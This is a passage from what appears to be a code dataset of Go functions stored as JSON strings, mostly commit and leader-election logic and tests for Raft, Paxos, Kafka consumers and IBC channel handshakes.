5, 1, storage)\n\t\tsm.becomeFollower(2, 2)\n\t\tsm.raftLog.commitTo(commit)\n\t\tsm.handleHeartbeat(tt.m)\n\t\tif sm.raftLog.committed != tt.wCommit {\n\t\t\tt.Errorf(\"#%d: committed = %d, want %d\", i, sm.raftLog.committed, tt.wCommit)\n\t\t}\n\t\tm := sm.readMessages()\n\t\tif len(m) != 1 {\n\t\t\tt.Fatalf(\"#%d: msg = nil, want 1\", i)\n\t\t}\n\t\tif m[0].Type != pb.MsgHeartbeatResp {\n\t\t\tt.Errorf(\"#%d: type = %v, want MsgHeartbeatResp\", i, m[0].Type)\n\t\t}\n\t}\n}", "func (p *paxos) RecvCommit(args *paxosrpc.CommitArgs, reply *paxosrpc.CommitReply) error {\n\tif p.simulateNetworkError((*args).Committed.Sequence.Round) {\n\t\treturn nil\n\t}\n\tp.dataLock.Lock()\n\tdefer p.dataLock.Unlock()\n\tif p.highestSequence == nil || p.compare(p.highestSequence, (*args).Committed.Sequence) == LESS {\n\t\tp.highestSequence = (*args).Committed.Sequence\n\t}\n\t//Normal commit\n\tif (*args).Committed.Sequence.Round == p.contestedRound {\n\t\tround, ok := p.commits[(*args).Committed.Sequence.Round]\n\t\tif ok {\n\t\t\t(*round).committed = true\n\t\t} else {\n\t\t\tp.commits[(*args).Committed.Sequence.Round] = &Round{(*args).Committed.Sequence, (*args).Committed, true}\n\t\t}\n\t\tp.learner.RecvCommit((*args).Committed.Value, false)\n\t\tp.contestedRound++\n\t\tp.noopRound = p.contestedRound\n\t\tp.catchup()\n\t\t//We are 'behind' and we need to propose noops\n\t} else if (*args).Committed.Sequence.Round > p.contestedRound {\n\t\tround, ok := p.commits[(*args).Committed.Sequence.Round]\n\t\tif ok {\n\t\t\t(*round).committed = true\n\t\t\t(*round).previous = (*args).Committed\n\t\t} else {\n\t\t\tp.commits[(*args).Committed.Sequence.Round] = &Round{(*args).Committed.Sequence, (*args).Committed, true}\n\t\t}\n\t\t//We have already proposed the noops\n\t\tif (*args).Committed.Sequence.Round == p.noopRound {\n\t\t\t//We will record the commit and send to learner when caught up\n\t\t\tp.noopRound++\n\t\t} else { //We need to propose the noops still\n\t\t\t//We need to do some catchup because we are behind\n\t\t\tvar i uint64\n\t\t\tvar diff uint64 = (*args).Committed.Sequence.Round - p.noopRound\n\t\t\tfor i = 0; i < diff; i++ {\n\t\t\t\tp.noopRound++\n\t\t\t\tgo p.Propose(new(paxosrpc.ProposeArgs), new(paxosrpc.ProposeReply))\n\t\t\t}\n\t\t\tp.noopRound++\n\t\t}\n\t}\n\treturn nil\n}", "func TestFollowerCommitEntry(t *testing.T) {\n\ttests := []struct {\n\t\tents []pb.Entry\n\t\tcommit uint64\n\t}{\n\t\t{\n\t\t\t[]pb.Entry{\n\t\t\t\t{Term: 1, Index: 1, Data: []byte(\"some data\")},\n\t\t\t},\n\t\t\t1,\n\t\t},\n\t\t{\n\t\t\t[]pb.Entry{\n\t\t\t\t{Term: 1, Index: 1, Data: []byte(\"some data\")},\n\t\t\t\t{Term: 1, Index: 2, Data: []byte(\"some data2\")},\n\t\t\t},\n\t\t\t2,\n\t\t},\n\t\t{\n\t\t\t[]pb.Entry{\n\t\t\t\t{Term: 1, Index: 1, Data: []byte(\"some data2\")},\n\t\t\t\t{Term: 1, Index: 2, Data: []byte(\"some data\")},\n\t\t\t},\n\t\t\t2,\n\t\t},\n\t\t{\n\t\t\t[]pb.Entry{\n\t\t\t\t{Term: 1, Index: 1, Data: []byte(\"some data\")},\n\t\t\t\t{Term: 1, Index: 2, Data: []byte(\"some data2\")},\n\t\t\t},\n\t\t\t1,\n\t\t},\n\t}\n\tfor i, tt := range tests {\n\t\tr := newTestRaft(1, []uint64{1, 2, 3}, 10, 1, NewMemoryStorage())\n\t\tdefer closeAndFreeRaft(r)\n\t\tr.becomeFollower(1, 2)\n\n\t\tr.Step(pb.Message{From: 2, To: 1, Type: pb.MsgApp, Term: 1, Entries: tt.ents, Commit: tt.commit})\n\n\t\tif g := r.raftLog.committed; g != tt.commit {\n\t\t\tt.Errorf(\"#%d: committed = %d, want %d\", i, g, tt.commit)\n\t\t}\n\t\twents := tt.ents[:int(tt.commit)]\n\t\tif g := r.raftLog.nextEnts(); !reflect.DeepEqual(g, wents) {\n\t\t\tt.Errorf(\"#%d: nextEnts = %v, want %v\", i, g, wents)\n\t\t}\n\t}\n}", "func (suite *KeeperTestSuite) TestChanOpenAck() {\n\tvar (\n\t\tpath *ibctesting.Path\n\t\tcounterpartyChannelID string\n\t\tchannelCap *capabilitytypes.Capability\n\t\theightDiff uint64\n\t)\n\n\ttestCases := []testCase{\n\t\t{\"success\", func() {\n\t\t\tsuite.coordinator.SetupConnections(path)\n\t\t\tpath.SetChannelOrdered()\n\t\t\terr := path.EndpointA.ChanOpenInit()\n\t\t\tsuite.Require().NoError(err)\n\n\t\t\terr = path.EndpointB.ChanOpenTry()\n\t\t\tsuite.Require().NoError(err)\n\n\t\t\tchannelCap = suite.chainA.GetChannelCapability(path.EndpointA.ChannelConfig.PortID, path.EndpointA.ChannelID)\n\t\t}, true},\n\t\t{\"success with empty stored counterparty channel ID\", func() {\n\t\t\tsuite.coordinator.SetupConnections(path)\n\t\t\tpath.SetChannelOrdered()\n\n\t\t\terr := path.EndpointA.ChanOpenInit()\n\t\t\tsuite.Require().NoError(err)\n\n\t\t\terr = path.EndpointB.ChanOpenTry()\n\t\t\tsuite.Require().NoError(err)\n\n\t\t\t// set the channel's counterparty channel identifier to empty string\n\t\t\tchannel := path.EndpointA.GetChannel()\n\t\t\tchannel.Counterparty.ChannelId = \"\"\n\n\t\t\t// use a different channel identifier\n\t\t\tcounterpartyChannelID = path.EndpointB.ChannelID\n\n\t\t\tsuite.chainA.App.GetIBCKeeper().ChannelKeeper.SetChannel(suite.chainA.GetContext(), path.EndpointA.ChannelConfig.PortID, path.EndpointA.ChannelID, channel)\n\n\t\t\tchannelCap = suite.chainA.GetChannelCapability(path.EndpointA.ChannelConfig.PortID, path.EndpointA.ChannelID)\n\t\t}, true},\n\t\t{\"channel doesn't exist\", func() {}, false},\n\t\t{\"channel state is not INIT or TRYOPEN\", func() {\n\t\t\t// create fully open channels on both chains\n\t\t\tsuite.coordinator.Setup(path)\n\t\t\tchannelCap = suite.chainA.GetChannelCapability(path.EndpointA.ChannelConfig.PortID, path.EndpointA.ChannelID)\n\t\t}, false},\n\t\t{\"connection not found\", func() {\n\t\t\tsuite.coordinator.SetupConnections(path)\n\t\t\tpath.SetChannelOrdered()\n\t\t\terr := path.EndpointA.ChanOpenInit()\n\t\t\tsuite.Require().NoError(err)\n\n\t\t\terr = path.EndpointB.ChanOpenTry()\n\t\t\tsuite.Require().NoError(err)\n\n\t\t\tchannelCap = suite.chainA.GetChannelCapability(path.EndpointA.ChannelConfig.PortID, path.EndpointA.ChannelID)\n\n\t\t\t// set the channel's connection hops to wrong connection ID\n\t\t\tchannel := path.EndpointA.GetChannel()\n\t\t\tchannel.ConnectionHops[0] = \"doesnotexist\"\n\t\t\tsuite.chainA.App.GetIBCKeeper().ChannelKeeper.SetChannel(suite.chainA.GetContext(), path.EndpointA.ChannelConfig.PortID, path.EndpointA.ChannelID, channel)\n\t\t}, false},\n\t\t{\"connection is not OPEN\", func() {\n\t\t\tsuite.coordinator.SetupClients(path)\n\n\t\t\terr := path.EndpointA.ConnOpenInit()\n\t\t\tsuite.Require().NoError(err)\n\n\t\t\t// create channel in init\n\t\t\tpath.SetChannelOrdered()\n\n\t\t\terr = path.EndpointA.ChanOpenInit()\n\t\t\tsuite.Require().NoError(err)\n\n\t\t\tsuite.chainA.CreateChannelCapability(suite.chainA.GetSimApp().ScopedIBCMockKeeper, path.EndpointA.ChannelConfig.PortID, path.EndpointA.ChannelID)\n\t\t\tchannelCap = suite.chainA.GetChannelCapability(path.EndpointA.ChannelConfig.PortID, path.EndpointA.ChannelID)\n\t\t}, false},\n\t\t{\"consensus state not found\", func() {\n\t\t\tsuite.coordinator.SetupConnections(path)\n\t\t\tpath.SetChannelOrdered()\n\n\t\t\terr := path.EndpointA.ChanOpenInit()\n\t\t\tsuite.Require().NoError(err)\n\n\t\t\terr = path.EndpointB.ChanOpenTry()\n\t\t\tsuite.Require().NoError(err)\n\n\t\t\tchannelCap = suite.chainA.GetChannelCapability(path.EndpointA.ChannelConfig.PortID, path.EndpointA.ChannelID)\n\n\t\t\theightDiff = 3 // consensus state doesn't exist at this height\n\t\t}, false},\n\t\t{\"invalid counterparty channel identifier\", func() {\n\t\t\tsuite.coordinator.SetupConnections(path)\n\t\t\tpath.SetChannelOrdered()\n\n\t\t\terr := path.EndpointA.ChanOpenInit()\n\t\t\tsuite.Require().NoError(err)\n\n\t\t\terr = path.EndpointB.ChanOpenTry()\n\t\t\tsuite.Require().NoError(err)\n\n\t\t\tcounterpartyChannelID = \"otheridentifier\"\n\n\t\t\tchannelCap = suite.chainA.GetChannelCapability(path.EndpointA.ChannelConfig.PortID, path.EndpointA.ChannelID)\n\t\t}, false},\n\t\t{\"channel verification failed\", func() {\n\t\t\t// chainB is INIT, chainA in TRYOPEN\n\t\t\tsuite.coordinator.SetupConnections(path)\n\t\t\tpath.SetChannelOrdered()\n\n\t\t\terr := path.EndpointB.ChanOpenInit()\n\t\t\tsuite.Require().NoError(err)\n\n\t\t\terr = path.EndpointA.ChanOpenTry()\n\t\t\tsuite.Require().NoError(err)\n\n\t\t\tchannelCap = suite.chainA.GetChannelCapability(path.EndpointA.ChannelConfig.PortID, path.EndpointA.ChannelID)\n\t\t}, false},\n\t\t{\"channel capability not found\", func() {\n\t\t\tsuite.coordinator.SetupConnections(path)\n\t\t\tpath.SetChannelOrdered()\n\t\t\terr := path.EndpointA.ChanOpenInit()\n\t\t\tsuite.Require().NoError(err)\n\n\t\t\tpath.EndpointB.ChanOpenTry()\n\n\t\t\tchannelCap = capabilitytypes.NewCapability(6)\n\t\t}, false},\n\t}\n\n\tfor _, tc := range testCases {\n\t\ttc := tc\n\t\tsuite.Run(fmt.Sprintf(\"Case %s\", tc.msg), func() {\n\t\t\tsuite.SetupTest() // reset\n\t\t\tcounterpartyChannelID = \"\" // must be explicitly changed in malleate\n\t\t\theightDiff = 0 // must be explicitly changed\n\t\t\tpath = ibctesting.NewPath(suite.chainA, suite.chainB)\n\n\t\t\ttc.malleate()\n\n\t\t\tif counterpartyChannelID == \"\" {\n\t\t\t\tcounterpartyChannelID = ibctesting.FirstChannelID\n\t\t\t}\n\n\t\t\tif path.EndpointA.ClientID != \"\" {\n\t\t\t\t// ensure client is up to date\n\t\t\t\terr := path.EndpointA.UpdateClient()\n\t\t\t\tsuite.Require().NoError(err)\n\t\t\t}\n\n\t\t\tchannelKey := host.ChannelKey(path.EndpointB.ChannelConfig.PortID, ibctesting.FirstChannelID)\n\t\t\tproof, proofHeight := suite.chainB.QueryProof(channelKey)\n\n\t\t\terr := suite.chainA.App.GetIBCKeeper().ChannelKeeper.ChanOpenAck(\n\t\t\t\tsuite.chainA.GetContext(), path.EndpointA.ChannelConfig.PortID, path.EndpointA.ChannelID, channelCap, path.EndpointB.ChannelConfig.Version, counterpartyChannelID,\n\t\t\t\tproof, malleateHeight(proofHeight, heightDiff),\n\t\t\t)\n\n\t\t\tif tc.expPass {\n\t\t\t\tsuite.Require().NoError(err)\n\t\t\t} else {\n\t\t\t\tsuite.Require().Error(err)\n\t\t\t}\n\t\t})\n\t}\n}", "func TestRemoveLeader(t *testing.T) {\n\tdefer leaktest.AfterTest(t)\n\tstopper := stop.NewStopper()\n\tconst clusterSize = 6\n\tconst groupSize = 3\n\tcluster := newTestCluster(nil, clusterSize, stopper, t)\n\tdefer stopper.Stop()\n\n\t// Consume and apply the membership change events.\n\tfor i := 0; i < clusterSize; i++ {\n\t\tgo func(i int) {\n\t\t\tfor {\n\t\t\t\tif e, ok := <-cluster.events[i].MembershipChangeCommitted; ok {\n\t\t\t\t\te.Callback(nil)\n\t\t\t\t} else {\n\t\t\t\t\treturn\n\t\t\t\t}\n\t\t\t}\n\t\t}(i)\n\t}\n\n\t// Tick all the clocks in the background to ensure that all the\n\t// necessary elections are triggered.\n\t// TODO(bdarnell): newTestCluster should have an option to use a\n\t// real clock instead of a manual one.\n\tstopper.RunWorker(func() {\n\t\tticker := time.NewTicker(10 * time.Millisecond)\n\t\tdefer ticker.Stop()\n\t\tfor {\n\t\t\tselect {\n\t\t\tcase <-stopper.ShouldStop():\n\t\t\t\treturn\n\t\t\tcase <-ticker.C:\n\t\t\t\tfor _, t := range cluster.tickers {\n\t\t\t\t\tt.NonBlockingTick()\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t})\n\n\t// Create a group with three members.\n\tgroupID := roachpb.RangeID(1)\n\tcluster.createGroup(groupID, 0, groupSize)\n\n\t// Move the group one node at a time from the first three nodes to\n\t// the last three. In the process, we necessarily remove the leader\n\t// and trigger at least one new election among the new nodes.\n\tfor i := 0; i < groupSize; i++ {\n\t\tlog.Infof(\"adding node %d\", i+groupSize)\n\t\tch := cluster.nodes[i].ChangeGroupMembership(groupID, makeCommandID(),\n\t\t\traftpb.ConfChangeAddNode,\n\t\t\troachpb.ReplicaDescriptor{\n\t\t\t\tNodeID: cluster.nodes[i+groupSize].nodeID,\n\t\t\t\tStoreID: roachpb.StoreID(cluster.nodes[i+groupSize].nodeID),\n\t\t\t\tReplicaID: roachpb.ReplicaID(cluster.nodes[i+groupSize].nodeID),\n\t\t\t}, nil)\n\t\tif err := <-ch; err != nil {\n\t\t\tt.Fatal(err)\n\t\t}\n\n\t\tlog.Infof(\"removing node %d\", i)\n\t\tch = cluster.nodes[i].ChangeGroupMembership(groupID, makeCommandID(),\n\t\t\traftpb.ConfChangeRemoveNode,\n\t\t\troachpb.ReplicaDescriptor{\n\t\t\t\tNodeID: cluster.nodes[i].nodeID,\n\t\t\t\tStoreID: roachpb.StoreID(cluster.nodes[i].nodeID),\n\t\t\t\tReplicaID: roachpb.ReplicaID(cluster.nodes[i].nodeID),\n\t\t\t}, nil)\n\t\tif err := <-ch; err != nil {\n\t\t\tt.Fatal(err)\n\t\t}\n\t}\n}", "func consumerTest(t *testing.T, testname string, msgcnt int, cc consumerCtrl, consumeFunc func(c *Consumer, mt *msgtracker, expCnt int), rebalanceCb func(c *Consumer, event Event) error) {\n\n\tif msgcnt == 0 {\n\t\tcreateTestMessages()\n\t\tproducerTest(t, \"Priming producer\", p0TestMsgs, producerCtrl{},\n\t\t\tfunc(p *Producer, m *Message, drChan chan Event) {\n\t\t\t\tp.ProduceChannel() <- m\n\t\t\t})\n\t\tmsgcnt = len(p0TestMsgs)\n\t}\n\n\tconf := ConfigMap{\"bootstrap.servers\": testconf.Brokers,\n\t\t\"go.events.channel.enable\": cc.useChannel,\n\t\t\"group.id\": testconf.GroupID,\n\t\t\"session.timeout.ms\": 6000,\n\t\t\"api.version.request\": \"true\",\n\t\t\"enable.auto.commit\": cc.autoCommit,\n\t\t\"debug\": \",\",\n\t\t\"auto.offset.reset\": \"earliest\"}\n\n\tconf.updateFromTestconf()\n\n\tc, err := NewConsumer(&conf)\n\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tdefer c.Close()\n\n\texpCnt := msgcnt\n\tmt := msgtrackerStart(t, expCnt)\n\n\tt.Logf(\"%s, expecting %d messages\", testname, expCnt)\n\tc.Subscribe(testconf.Topic, rebalanceCb)\n\n\tconsumeFunc(c, &mt, expCnt)\n\n\t//test commits\n\tswitch cc.commitMode {\n\tcase ViaCommitMessageAPI:\n\t\t// verify CommitMessage() API\n\t\tfor _, message := range mt.msgs {\n\t\t\t_, commitErr := c.CommitMessage(message)\n\t\t\tif commitErr != nil {\n\t\t\t\tt.Errorf(\"Cannot commit message. Error: %s\\n\", commitErr)\n\t\t\t}\n\t\t}\n\tcase ViaCommitOffsetsAPI:\n\t\t// verify CommitOffset\n\t\tpartitions := make([]TopicPartition, len(mt.msgs))\n\t\tfor index, message := range mt.msgs {\n\t\t\tpartitions[index] = message.TopicPartition\n\t\t}\n\t\t_, commitErr := c.CommitOffsets(partitions)\n\t\tif commitErr != nil {\n\t\t\tt.Errorf(\"Failed to commit using CommitOffsets. Error: %s\\n\", commitErr)\n\t\t}\n\tcase ViaCommitAPI:\n\t\t// verify Commit() API\n\t\t_, commitErr := c.Commit()\n\t\tif commitErr != nil {\n\t\t\tt.Errorf(\"Failed to commit. Error: %s\", commitErr)\n\t\t}\n\n\t}\n\n\t// Trigger RevokePartitions\n\tc.Unsubscribe()\n\n\t// Handle RevokePartitions\n\tc.Poll(500)\n\n}", "func (server *Server) LeaderCommitOp(op *rpc.Operation, idx string) *common.Future {\n\treq := &rpc.CommitRequest{\n\t\tIdx: idx,\n\t\tOp: op,\n\t}\n\n\t// Async RPC to followers\n\tcommitNum := 0\n\tvar commitLock sync.Mutex\n\tcommitCv := sync.NewCond(&commitLock)\n\tfor _, addr := range server.FollowerAddrList {\n\t\tgo func(addr string) {\n\t\t\tserver.SendCommitRequest(addr, req)\n\n\t\t\tcommitLock.Lock()\n\t\t\tcommitNum++\n\t\t\tcommitLock.Unlock()\n\t\t\tcommitCv.Signal()\n\t\t}(addr)\n\t}\n\n\t// Async local commit\n\tgo func() {\n\t\tserver.CommitOp(op, idx).GetValue()\n\t\tcommitLock.Lock()\n\t\tcommitNum++\n\t\tcommitLock.Unlock()\n\t\tcommitCv.Signal()\n\t}()\n\n\tdone := common.NewFuture()\n\n\tgo func() {\n\t\tcommitLock.Lock()\n\t\tfor commitNum < server.MajorityNum {\n\t\t\tcommitCv.Wait()\n\t\t}\n\t\tcommitLock.Unlock()\n\t\tdone.SetValue(true)\n\t}()\n\n\treturn done\n}", "func TestProposeAfterRemoveLeader(t *testing.T) {\n\tctx, cancel := context.WithCancel(context.Background())\n\tdefer cancel()\n\n\tmn := newMultiNode(1)\n\tgo mn.run()\n\tdefer mn.Stop()\n\n\tstorage := NewMemoryStorage()\n\tif err := mn.CreateGroup(1, newTestConfig(1, nil, 10, 1, storage),\n\t\t[]Peer{{ID: 1}}); err != nil {\n\t\tt.Fatal(err)\n\t}\n\tif err := mn.Campaign(ctx, 1); err != nil {\n\t\tt.Fatal(err)\n\t}\n\n\tif err := mn.ProposeConfChange(ctx, 1, raftpb.ConfChange{\n\t\tType: raftpb.ConfChangeRemoveNode,\n\t\tNodeID: 1,\n\t}); err != nil {\n\t\tt.Fatal(err)\n\t}\n\tgs := <-mn.Ready()\n\tg := gs[1]\n\tif err := storage.Append(g.Entries); err != nil {\n\t\tt.Fatal(err)\n\t}\n\tfor _, e := range g.CommittedEntries {\n\t\tif e.Type == raftpb.EntryConfChange {\n\t\t\tvar cc raftpb.ConfChange\n\t\t\tif err := cc.Unmarshal(e.Data); err != nil {\n\t\t\t\tt.Fatal(err)\n\t\t\t}\n\t\t\tmn.ApplyConfChange(1, cc)\n\t\t}\n\t}\n\tmn.Advance(gs)\n\n\tif err := mn.Propose(ctx, 1, []byte(\"somedata\")); err != nil {\n\t\tt.Errorf(\"err = %v, want nil\", err)\n\t}\n}", "func testCommit(t *testing.T, myApp app.BaseApp, h int64) []byte {\n\t// Commit first block, make sure non-nil hash\n\theader := abci.Header{Height: h}\n\tmyApp.BeginBlock(abci.RequestBeginBlock{Header: header})\n\tmyApp.EndBlock(abci.RequestEndBlock{})\n\tcres := myApp.Commit()\n\thash := cres.Data\n\tassert.NotEmpty(t, hash)\n\treturn hash\n}", "func (e *Election) commitIfLast(msg *messages.LeaderLevelMessage) *messages.LeaderLevelMessage {\n\t// If commit is true, then we are done. Return the EOM\n\t// commit := e.CommitmentIndicator.ShouldICommit(msg)\n\tif e.CommitmentTally > 3 { //commit {\n\t\te.Committed = true\n\t\tmsg.Committed = true\n\t\tmsg.EOMFrom = e.Self\n\t\te.executeDisplay(msg)\n\t}\n\treturn msg\n}", "func (p *Provider) LeaseCommit(tx *lease.Tx) error {\n\tp.mutex.RLock()\n\tdefer p.mutex.RUnlock()\n\n\terr := p.source.LeaseCommit(tx)\n\tif err == nil {\n\t\tp.record(tx)\n\t}\n\treturn err\n}", "func (c *Cyclone) commit(msg *erebos.Transport) {\n\tmsg.Commit <- &erebos.Commit{\n\t\tTopic: msg.Topic,\n\t\tPartition: msg.Partition,\n\t\tOffset: msg.Offset,\n\t}\n}", "func (l *leader) onMajorityCommit() {\n\tmajorityMatchIndex := l.majorityMatchIndex()\n\n\t// note: if majorityMatchIndex >= ldr.startIndex, it also mean\n\t// majorityMatchIndex.term == currentTerm\n\tif majorityMatchIndex > l.commitIndex && majorityMatchIndex >= l.startIndex {\n\t\tl.setCommitIndex(majorityMatchIndex)\n\t\tl.applyCommitted()\n\t\tl.notifyFlr(false) // we updated commit index\n\t}\n}", "func (c *offsetCoordinator) commit(\n\ttopic string, partition int32, offset int64, metadata string) (resErr error) {\n\t// Eliminate the scenario where Kafka erroneously returns -1 as the offset\n\t// which then gets made permanent via an immediate flush.\n\t//\n\t// Technically this disallows a valid use case of rewinding a consumer\n\t// group to the beginning, but 1) this isn't possible through any API we\n\t// currently expose since you cannot have a message numbered -1 in hand;\n\t// 2) this restriction only applies to partitions with a non-expired\n\t// message at offset 0.\n\tif offset < 0 {\n\t\treturn fmt.Errorf(\"Cannot commit negative offset %d for [%s:%d].\",\n\t\t\toffset, topic, partition)\n\t}\n\n\tretry := &backoff.Backoff{Min: c.conf.RetryErrWait, Jitter: true}\n\tfor try := 0; try < c.conf.RetryErrLimit; try++ {\n\t\tif try != 0 {\n\t\t\ttime.Sleep(retry.Duration())\n\t\t}\n\n\t\t// get a copy of our connection with the lock, this might establish a new\n\t\t// connection so can take a bit\n\t\tconn, err := c.broker.coordinatorConnection(c.conf.ConsumerGroup)\n\t\tif conn == nil {\n\t\t\tresErr = err\n\t\t\tcontinue\n\t\t}\n\t\tdefer func(lconn *connection) { go c.broker.conns.Idle(lconn) }(conn)\n\n\t\tresp, err := conn.OffsetCommit(&proto.OffsetCommitReq{\n\t\t\tClientID: c.broker.conf.ClientID,\n\t\t\tConsumerGroup: c.conf.ConsumerGroup,\n\t\t\tTopics: []proto.OffsetCommitReqTopic{\n\t\t\t\t{\n\t\t\t\t\tName: topic,\n\t\t\t\t\tPartitions: []proto.OffsetCommitReqPartition{\n\t\t\t\t\t\t{ID: partition, Offset: offset, Metadata: metadata},\n\t\t\t\t\t},\n\t\t\t\t},\n\t\t\t},\n\t\t})\n\t\tresErr = err\n\n\t\tif _, ok := err.(*net.OpError); ok || err == io.EOF || err == syscall.EPIPE {\n\t\t\tlog.Debugf(\"connection died while committing on %s:%d for %s: %s\",\n\t\t\t\ttopic, partition, c.conf.ConsumerGroup, err)\n\t\t\t_ = conn.Close()\n\n\t\t} else if err == nil {\n\t\t\t// Should be a single response in the payload.\n\t\t\tfor _, t := range resp.Topics {\n\t\t\t\tfor _, p := range t.Partitions {\n\t\t\t\t\tif t.Name != topic || p.ID != partition {\n\t\t\t\t\t\tlog.Warningf(\"commit response with unexpected data for %s:%d\",\n\t\t\t\t\t\t\tt.Name, p.ID)\n\t\t\t\t\t\tcontinue\n\t\t\t\t\t}\n\t\t\t\t\treturn p.Err\n\t\t\t\t}\n\t\t\t}\n\t\t\treturn errors.New(\"response does not contain commit information\")\n\t\t}\n\t}\n\treturn resErr\n}", "func (s *SharedLog_) Commit(sequenceNumber raft.Lsn, conn net.Conn) {\n\n\tse := r.GetServer(r.id)\n\tlsnToCommit := se.LsnToCommit\n\n\tfor i:=lsnToCommit; i<=sequenceNumber; i++ {\n\t\tif(int(i)<=len(r.log.Entries)){\n\t\t\traft.Input_ch <- raft.String_Conn{string(r.log.Entries[i].Command), conn}\n\t\t\tr.log.Entries[i].IsCommitted = true\n\t\t} else { break }\n\t}\n\tse.LsnToCommit++\t\t\n}", "func (rf *Raft) FollowerCommit(leaderCommit int, m int) {\n\t//fmt.Printf(\"hi:%v \\n\", p)\n\tp := rf.commitIndex\n\tif leaderCommit > rf.commitIndex {\n\t\tif leaderCommit < m {\n\t\t\trf.commitIndex = leaderCommit\n\t\t} else {\n\t\t\trf.commitIndex = m\n\t\t}\n\t}else{\n\t\t//fmt.Printf(\"leaderCommit:%v rf.commitIndex:%v \\n\", leaderCommit, rf.commitIndex)\n\t}\n\tfor p++; p <= rf.commitIndex; p++ {\n\t\trf.applyCh <- ApplyMsg{Index:p, Command:rf.log[p-rf.log[0].Index].Command}\n\t\trf.lastApplied = p\n\t}\n\t//fmt.Printf(\"done \\n\")\n\t//fmt.Printf(\"server %v term %v role %v last append %v \\n\", rf.me, rf.currentTerm, rf.role, rf.lastApplied)\n}", "func TestInitBroker(t *testing.T) {\n\tcommitteeMock, k := agreement.MockCommittee(2, true, 2)\n\tbus := wire.NewEventBus()\n\troundChan := consensus.InitRoundUpdate(bus)\n\n\tgo agreement.Launch(bus, committeeMock, k[0])\n\ttime.Sleep(200 * time.Millisecond)\n\tinit := make([]byte, 8)\n\tbinary.LittleEndian.PutUint64(init, 1)\n\tbus.Publish(msg.InitializationTopic, bytes.NewBuffer(init))\n\n\tround := <-roundChan\n\tassert.Equal(t, uint64(1), round)\n}", "func TestRaft1(t *testing.T) {\n\n\t//Remove any state recovery files\n\tfor i := 0; i < 5; i++ {\n\t\tos.Remove(fmt.Sprintf(\"%s_S%d.state\", raft.FILENAME, i))\n\t}\n\n\tgo main() //Starts all servers\n\n\tvar leaderId1, leaderId2 int\n\tack := make(chan bool)\n\n\ttime.AfterFunc(1*time.Second, func() {\n\t\tcheckIfLeaderExist(t)\n\t\tleaderId1 = raft.KillLeader() //Kill leader\n\t\tlog.Print(\"Killed leader:\", leaderId1)\n\t})\n\n\ttime.AfterFunc(2*time.Second, func() {\n\t\tcheckIfLeaderExist(t)\n\t\tleaderId2 = raft.KillLeader() //Kill current leader again\n\t\tlog.Print(\"Killed leader:\", leaderId2)\n\t})\n\n\ttime.AfterFunc(3*time.Second, func() {\n\t\tcheckIfLeaderExist(t)\n\t\traft.ResurrectServer(leaderId2) //Resurrect last killed as follower\n\t\tlog.Print(\"Resurrected previous leader:\", leaderId2)\n\t})\n\n\ttime.AfterFunc(4*time.Second, func() {\n\t\tcheckIfLeaderExist(t)\n\t\traft.ResurrectServerAsLeader(leaderId1) //Ressurect first one as leader\n\t\tlog.Print(\"Resurrected previous leader:\", leaderId1)\n\t})\n\n\ttime.AfterFunc(5*time.Second, func() {\n\t\tcheckIfLeaderExist(t)\n\t\tack <- true\n\t})\n\n\t<-ack\n}", "func (cfg *ConsensusConfiguration) Commit(t time.Time) time.Time {\n\treturn t.Add(cfg.TimeoutCommit)\n}", "func (coord *Coordinator) WriteAcknowledgement(\n\tsource, counterparty *TestChain,\n\tpacket exported.PacketI,\n\tcounterpartyClientID string,\n) error {\n\tif err := source.WriteAcknowledgement(packet); err != nil {\n\t\treturn err\n\t}\n\tcoord.IncrementTime()\n\n\t// update source client on counterparty connection\n\treturn coord.UpdateClient(\n\t\tcounterparty, source,\n\t\tcounterpartyClientID, exported.Tendermint,\n\t)\n}", "func (s *raftServer) updateLeaderCommitIndex(followers []int, matchIndex *utils.SyncIntIntMap) {\n\n\tfor s.State() == LEADER {\n\t\tN := s.commitIndex.Get() + 1\n\t\tupto := N + 1\n\n\t\tfor N <= upto {\n\n\t\t\tif !s.localLog.Exists(N) {\n\t\t\t\tbreak\n\t\t\t}\n\n\t\t\ti := 1\n\t\t\tfor _, f := range followers {\n\t\t\t\tif j, _ := matchIndex.Get(f); j >= N {\n\t\t\t\t\ti++\n\t\t\t\t\tupto = max(upto, j)\n\t\t\t\t}\n\t\t\t}\n\t\t\t// followers do not include Leader\n\t\t\tif entry := s.localLog.Get(N); i > (len(followers)+1)/2 && entry.Term == s.Term() {\n\t\t\t\ts.writeToLog(\"Updating commitIndex to \" + strconv.FormatInt(N, 10))\n\t\t\t\ts.commitIndex.Set(N)\n\t\t\t}\n\t\t\tN++\n\t\t}\n\t\ttime.Sleep(NICE * time.Millisecond)\n\t}\n}", "func maybeCommit(c *kafka.Consumer, topicPartition kafka.TopicPartition) error {\n\t// Commit the already-stored offsets to Kafka whenever the offset is divisible\n\t// by 10, otherwise return early.\n\t// This logic is completely arbitrary. We can use any other internal or\n\t// external variables to decide when we commit the already-stored offsets.\n\tif topicPartition.Offset%10 != 0 {\n\t\treturn nil\n\t}\n\n\tcommitedOffsets, err := c.Commit()\n\n\t// ErrNoOffset occurs when there are no stored offsets to commit. This\n\t// can happen if we haven't stored anything since the last commit.\n\t// While this will never happen for this example since we call this method\n\t// per-message, and thus, always have something to commit, the error\n\t// handling is illustrative of how to handle it in cases we call Commit()\n\t// in another way, for example, every N seconds.\n\tif err != nil && err.(kafka.Error).Code() != kafka.ErrNoOffset {\n\t\treturn err\n\t}\n\n\tfmt.Printf(\"%% Commited offsets to Kafka: %v\\n\", commitedOffsets)\n\treturn nil\n}", "func TestLogNewLog(t *testing.T) {\n\tpath := getLogPath()\n\tlog := NewLog()\n\tlog.AddCommandType(&TestCommand1{})\n\tlog.AddCommandType(&TestCommand2{})\n\tif err := log.Open(path); err != nil {\n\t\tt.Fatalf(\"Unable to open log: %v\", err)\n\t}\n\tdefer log.Close()\n\tdefer os.Remove(path)\n\t\n\tif err := log.Append(NewLogEntry(log, 1, 1, &TestCommand1{\"foo\", 20})); err != nil {\n\t\tt.Fatalf(\"Unable to append: %v\", err)\n\t}\n\tif err := log.Append(NewLogEntry(log, 2, 1, &TestCommand2{100})); err != nil {\n\t\tt.Fatalf(\"Unable to append: %v\", err)\n\t}\n\tif err := log.Append(NewLogEntry(log, 3, 2, &TestCommand1{\"bar\", 0})); err != nil {\n\t\tt.Fatalf(\"Unable to append: %v\", err)\n\t}\n\t\n\t// Partial commit.\n\tif err := log.SetCommitIndex(2); err != 